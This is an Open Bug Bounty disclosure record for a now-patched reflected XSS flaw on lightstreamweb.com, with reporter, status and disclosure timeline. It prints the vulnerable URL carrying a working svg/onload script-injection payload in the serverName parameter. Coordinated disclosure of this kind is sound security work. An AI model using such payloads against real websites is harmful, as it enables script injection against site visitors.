lightstreamweb.com XSS vulnerability

2016-01-09T12:26:00
ID OBB:122876
Type openbugbounty
Reporter Spam404
Modified 2017-07-26T12:13:00

Description

Vulnerable URL:
http://lightstreamweb.com/_advanced_site/slideshow/146slideshow.php?serverName=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&client_id=175&slideshowFolder=art_large&bgColorForSlideshow=ffffff&rand_image1=classic_car_31.jpg&rand_image2=classic_car_28.jpg&rand_image3=classic_car_14.jpg&rand_image4=classic_car_17.jpg&bgColorForSlideshow=ffffff&rand_pic1=20752&rand_pic2=20749&rand_pic3=20569&rand_pic4=20572&slideshow_id=152
Details:

Description| Value
---|---
Patched:| Yes, on 26.07.2017
Latest check for patch:| 26.07.2017 12:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3989273
Google Pagerank| 0
VIP website status:| No
Check lightstreamweb.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 January, 2016 12:26 GMT
Vulnerability existence verified and confirmed| 9 January, 2016 12:28 GMT
Vulnerability details disclosed by researcher| 2 April, 2016 13:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 12:13 GMT